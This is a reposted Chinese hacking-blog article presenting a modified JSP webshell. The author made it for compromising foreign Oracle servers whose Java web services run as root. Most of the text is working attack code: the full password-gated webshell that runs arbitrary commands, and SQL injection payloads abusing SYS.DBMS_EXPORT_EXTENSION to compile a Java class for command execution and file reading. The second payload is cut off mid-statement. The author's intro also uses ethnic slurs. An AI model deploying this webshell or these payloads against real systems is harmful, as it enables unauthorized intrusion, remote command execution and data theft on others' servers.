改的一个非GBK的JSP的webshell[网络技术]
本文“改的一个非GBK的JSP的webshell[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
摘自:影子鹰
近碰到些国外的oracle服务器,此中好多系统的内核无法local root,但是有在root权限下跑的java的web服务,有在web目录写权限,但是常常用的jshell是GBK的,在国外(先是棒子,放过了,后有小鬼子,再后来还有阿三,实在受不了了,自己改一个)的机械上基本不支持该字体,没办法自己改了一个cmd的webshell多加了一个密码认证.
------------------------------淫荡代码分割线------------------------------
<%@ page import="java.io.*" %>
<%
//by: vitter@safechina.net
String PASS = "vitter";
String cmd = request.getParameter("cmd");
String pass = request.getParameter("pass");
String output = "";
if (pass != null && pass.trim().length() > 0) {
if (pass.equals(PASS)) {
output = "Success";
request.getSession().setAttribute("loginUser", "loginOk");
} else {
output = "password ERR!";
request.getSession().removeAttribute("loginUser");
}
} else if (cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while ((s = sI.readLine()) != null) {
output += s;
}
}
catch (IOException e) {
e.printStackTrace();
}
}
boolean ifLogin = false;
Object loingUser = request.getSession().getAttribute("loginUser");
if (loingUser != null) {
ifLogin = true;
}
%>
<FORM METHOD=POST ACTION='vittercmd.jsp'>
<%
if (!ifLogin) {
%>
Password:<INPUT name='pass' type=password>
<%
} else {
%>
CMD:<INPUT name='cmd' type=TEXT>
<%
}
%>
<INPUT type=submit value='Run'>
</FORM>
<hr>
<pre>
<%=output %>
</pre>
附:oracle提权的小本领
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual ;
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*;import java.net.URL; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
以上是“改的一个非GBK的JSP的webshell[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |